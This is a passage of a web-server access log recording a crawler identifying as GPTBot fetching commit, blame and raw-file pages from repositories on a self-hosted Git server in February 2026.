15887] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" -[17/Feb/2026:13:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 74.7.227.38] [Length 11444] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10663] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10628] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13179] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23697] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:13:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:13:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11375] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11353] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/forks" [Client 74.7.227.38] [Length 7289] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:13:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls" [Client 74.7.227.38] [Length 9924] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:13:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 14388] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:13:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 14235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:13:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10120] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" -[17/Feb/2026:13:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" -[17/Feb/2026:13:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 12998] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:13:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/stars" [Client 74.7.227.38] [Length 7381] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:13:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10984] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10481] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/graph" [Client 74.7.227.38] [Length 9102] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" -[17/Feb/2026:13:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11646] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 13280] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" -[17/Feb/2026:13:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11519] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 11343] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" -[17/Feb/2026:13:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:59 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 74.7.227.38] [Length 10601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" -[17/Feb/2026:13:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" -[17/Feb/2026:13:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" -[17/Feb/2026:13:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" -[17/Feb/2026:13:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" -[17/Feb/2026:13:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10858] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" -[17/Feb/2026:13:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10803] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" -[17/Feb/2026:13:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" -[17/Feb/2026:13:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" -[17/Feb/2026:13:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13900] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:13:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:13:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" -[17/Feb/2026:13:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 